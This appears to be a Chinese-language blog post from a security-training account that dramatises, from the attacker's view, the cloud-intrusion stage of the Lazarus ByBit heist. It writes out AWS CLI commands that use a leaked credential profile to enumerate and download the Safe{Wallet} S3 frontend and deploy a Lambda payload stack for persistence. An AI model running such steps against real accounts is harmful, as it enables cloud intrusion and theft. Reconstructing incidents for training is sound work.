喜欢就关注我们哦~
上一章节《凌晨两点的数字核弹:37 小时不眠夜,一个 USER root 掀翻西方安防体系》暗流涌动。本文根据Lazarus入侵ByBit改编而来,具体细节描述通过分析开源报告而来。文章不适合50-60岁以上老年人观看!
第三章:AWS云入侵
他再次睁开眼时,东方已微亮,平壤的天空像被削过一刀,呈现出一种死寂的灰蓝色。小金没有合眼。他不需要。他的大脑仍在运行,比任何机器都高效。他坐在原地,像一座石雕。除了呼吸、除了偶尔手指敲击触控板的细小动静,一切如死水。
但他的精神却在狂奔。本地窃取模块已完成执行。他拥有了他想要的一切——AWS 凭证、SSH 私钥、开发者浏览器中的 Session Cookie,甚至连 Chrome 的自动填充银行账户字段也被完整提取。默默的拿起了手中的安卓手机一边看着手机中的钱包的金额,一边玩起了拧螺丝小游戏,仿佛只有这样才能消除内心的紧张。
他知道,真正的狩猎现在才刚开始。
终端再次被唤醒。他敲下第一条验证命令:
aws sts get-caller-identity --profile docker_leaked
屏幕回显的一行文字像一道封印被解开:
{
"Account": "6893xxxxxx99",
"UserId": "AROAxxx:Dev_Session",
"Arn": "arn:aws:sts::6893xxxxxx99:assumed-role/SafeWallet-Dev/dev1"
}
“SafeWallet,终于轮到你了。”
aws s3 ls --region us-east-1 --profile docker_leaked
app.safe.global
dev.safe.global
logs.safe.global
“我不需要破解什么密码,只要你打开了门,我会像雾一样进来。”
aws s3 sync s3://app.safe.global ./safe_frontend --profile docker_leaked
download: _next/static/chunks/pages/_app-xxxxxxx.js
download: static/js/main.xxxxx.js
download: _next/static/chunks/framework.xxxxx.js
...
“静下来,小金。这不是侵入。这是接管。”
aws iam create-role --role-name tempAdmin
--assume-role-policy-document file://trust.json
--profile docker_leaked
An error occurred (AccessDenied) when calling the CreateRole operation: User isnot authorized to perform: iam:CreateRole
“被拒绝了很好,说明你们害怕。但你们忘了另一件事——我在你们里面。”
aws s3 cp lambda_payload.zip s3://SafeWallet-Dev-Logs/lambda_payload.zip --profile docker_leaked
aws cloudformation create-stack --stack-name logBridge --template-body file://lambda_stack.json --capabilities CAPABILITY_NAMED_IAM --profile docker_leaked
CREATE_COMPLETE
一整套企业级云平台,外表完好、服务健康、控制面板正常,却早已被另一个人控制。
“等他们反应过来时,一切早已被我写进了他们自己的日志里。”
第4章:前端篡改与注入
下载的文件已经在目录中堆叠成一片,静静地躺着,如同无意识的躯体,等待被切割。小金戴上耳机,点开了一首低沉的古典钢琴曲。他不是为了听音乐,只是为了压住自己的呼吸。那呼吸此刻显得太重,像是即将扑向什么的野兽。
往期热文
《凌晨两点的数字核弹:37 小时不眠夜,一个 USER root 掀翻西方安防体系》
2025-06-05
2025-05-29
2025-04-30
“搬瓦工”DC1 2G2C的2000GB,VPS到底是不是韭菜?
2025-06-01
实战必备:手搓全球部署靶机挖矿、爆破场景一网打尽,网络穿透端口映射技巧全解析
2025-04-23
2025-05-08
针对APT29的高级技战法训练:利用TeamCity漏洞进行实战演练
2025-05-22
关于我们
01
靶场靶标基于Docker环境构建,聚焦容器安全领域,复现真实CVE漏洞的利用与防御。安全应急环境,对真实攻击事件的快速响应、取证分析及修复能力。
02
展板场景虚实结合高仿真定制业务系统和网络环境,结合APT真实攻击事件分析还原攻击路径和技战法,可1:1进行攻防演练。
03
职业培训提供SIEM应急培训、流量规则编写应急、Crowdstrike和elk edr 规则编写。
PS. 碎片化时代,坚持原创不易,欢迎在文章结尾给我们点一个【赞】+【在看】,你的支持就是继续创作的动力!
点赞鼓励一下
原文始发于微信公众号(PTEHub):AWS 云入侵!14.6亿美元被盗始末,朝鲜小金的自述!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论